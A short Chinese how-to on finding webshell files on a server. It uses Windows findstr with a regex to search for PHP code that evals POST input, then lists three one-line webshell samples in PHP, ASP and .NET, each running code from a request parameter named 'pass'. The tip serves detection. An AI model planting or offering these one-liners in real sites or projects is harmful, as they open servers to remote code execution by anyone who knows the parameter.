使用findstr查找本地木马文件

在当前目录和子目录下搜索

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php

/R是使用正则表达式，/S是在当前和子目录中查找，中间有空格

 

 

 

PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>